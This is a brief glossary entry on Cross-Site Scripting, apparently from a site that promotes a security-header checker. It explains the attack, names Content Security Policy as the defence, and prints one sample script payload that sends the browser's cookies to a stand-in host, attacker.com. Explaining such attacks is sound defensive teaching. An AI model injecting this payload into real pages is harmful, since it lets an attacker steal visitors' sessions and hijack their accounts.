XSS (Cross-Site Scripting)
XSS is a vulnerability where attackers inject malicious scripts into trusted websites.
In plain English
When a bad actor gets their own code to run on a site you trust (e.g. in a comment or search result), so it can steal your login or do things as you.
Cross-Site Scripting (XSS) occurs when an application includes untrusted data in a web page without proper validation or escaping. The attacker's script then runs in the victim's browser, potentially stealing session cookies, capturing passwords, or defacing the page.
Security headers like Content Security Policy (CSP) are the primary defense against XSS. Our header tool checks if your CSP is correctly configured to block unauthorized scripts.
Examples & Usage
Typical Payload
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>Common Vectors
"Search bars, comment sections, or URL parameters that reflect input back to the user without filtering."